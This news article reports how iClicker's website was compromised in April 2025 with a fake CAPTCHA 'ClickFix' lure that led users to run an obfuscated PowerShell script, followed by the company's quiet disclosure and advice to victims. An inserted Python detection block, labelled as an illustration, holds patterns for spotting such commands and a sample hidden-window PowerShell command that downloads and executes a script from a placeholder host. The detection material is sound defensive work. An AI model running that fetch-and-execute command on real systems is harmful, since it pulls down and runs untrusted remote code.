iClicker website compromised in sophisticated malware attack using fake CAPTCHA

A popular student engagement platform, iClicker, has been the target of a sophisticated cyberattack that tricked students and instructors into unknowingly installing malware on their devices.

The attack, which occurred between April 12 and April 16, 2025, exploited a fake CAPTCHA prompt on the iClicker website (iClicker.com), a digital classroom tool used by 5,000 instructors and 7 million students across numerous U.S. colleges and universities.

According to a security alert issued by the University of Michigan’s Safe Computing team, the compromised website displayed a fraudulent “I’m not a robot” CAPTCHA.

Unsuspecting users who clicked on this prompt inadvertently triggered a “ClickFix” social engineering attack.

This technique silently copied a malicious PowerShell script to the Windows clipboard. The fake CAPTCHA then instructed users to open the Windows Run dialog, paste the script, and execute it by pressing Enter, supposedly to verify their humanity.

A Reddit user later analyzed the executed PowerShell command on the Any.Run sandbox platform, revealing a heavily obfuscated payload.

Upon execution, this script would connect to a remote server at [.]14:8080 to download and execute a second, more specific PowerShell script.
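Detection logic for the execution chain described above, added here as an illustration and not part of the article or of any vendor's tooling: it scores process-creation events (Sysmon Event ID 1 style fields, constructed here) for a script host launched from the Run dialog with the traits of a pasted fetch-and-run one-liner, and applies the same check to Run-dialog history in the RunMRU registry key. The field names, the sample events and the stage.invalid host are assumptions.

```python
import re

# A process started from the Win+R Run dialog has explorer.exe as its parent.
RUN_DIALOG_PARENT = "explorer.exe"
HOST_BINARIES = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

# Traits typical of a pasted one-liner that fetches and runs a second stage.
TRAITS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
    "inline_eval": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "policy_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
}

def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def matched_traits(command_line: str) -> list:
    return [name for name, rx in TRAITS.items() if rx.search(command_line)]

def score_event(event: dict) -> dict:
    """Flag a script host launched from explorer.exe (the Run-dialog path) with >= 2 traits."""
    traits = matched_traits(event["command_line"])
    interactive = basename(event["parent_image"]) == RUN_DIALOG_PARENT
    host = basename(event["image"]) in HOST_BINARIES
    return {"traits": traits, "flagged": interactive and host and len(traits) >= 2}

def scan_runmru(values: dict) -> list:
    """Run-dialog history (HKCU\\...\\Explorer\\RunMRU) stores 'command\\1'; return entries with >= 2 traits."""
    hits = []
    for name, data in values.items():
        if name == "MRUList":          # ordering value, not a command
            continue
        cmd = data.rsplit("\\1", 1)[0]
        if len(matched_traits(cmd)) >= 2:
            hits.append(cmd)
    return hits

# Constructed sample events in Sysmon Event ID 1 style; not from the article.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe"},                          # user opened a console
    {"image": PS, "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r"powershell.exe -ep bypass -File C:\ops\backup.ps1"},  # scheduled task
    {"image": PS, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": 'powershell -w hidden -c "irm http://stage.invalid/s | iex"'},
]
```

The explorer.exe parent requirement keeps scheduled tasks and admin scripts out of the alert, and the RunMRU scan gives responders a quick check of what a user actually pasted into the Run dialog.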

Worryingly, the nature of the final malware payload remains unclear, as the downloaded script varied depending on the visitor.

The University of Michigan warned that for targeted individuals, the malware granted the attacker full access to the infected device.

In contrast, non-targeted visitors, such as malware analysis sandboxes, were served a legitimate Microsoft Visual C++ Redistributable, a tactic likely designed to evade detection.

This incident highlights the growing prevalence of ClickFix attacks, a social engineering technique that has been observed in various malware campaigns masquerading as Cloudflare CAPTCHAs, Google Meet prompts, and web browser errors.

Cybersecurity experts believe that this particular attack likely aimed to distribute an infostealer. Such malware is capable of stealing sensitive data, including browser cookies, login credentials, passwords, credit card information, and browsing history from popular web browsers.

It can also target cryptocurrency wallets and sensitive text files.

The stolen data could be leveraged for further malicious activities, including large-scale data breaches and ransomware attacks. Given the target demographic of college students and instructors, a potential motive could be the theft of university credentials to facilitate attacks on college networks.

BleepingComputer discovered a quietly published security bulletin on iClicker's website on May 6. The company included a <meta name='robots' content='noindex, nofollow' /> tag in the page's HTML, effectively preventing search engines from indexing the bulletin and making it significantly harder for users to find information about the security incident.

The security bulletin stated, “We recently resolved an incident affecting the iClicker landing page (iClicker.com). Importantly, no iClicker data, apps, or operations were impacted and the identified vulnerability on the iClicker landing page has been resolved.”

iClicker described the incident as an “unrelated third party” placing a false CAPTCHA on their landing page before users logged in, aiming to trick users into clicking it, similar to phishing emails.

Out of caution, iClicker advised any faculty or student who encountered and clicked on the fake CAPTCHA between April 12 and April 16 to run security software to ensure their devices are protected.

Users who accessed iClicker.com during the affected period and followed the fake CAPTCHA instructions are strongly urged to immediately change their iClicker password.

If they executed the pasted command, they should also change every password stored on their computer to a unique, strong password for each website, ideally using a password manager such as BitWarden or 1Password.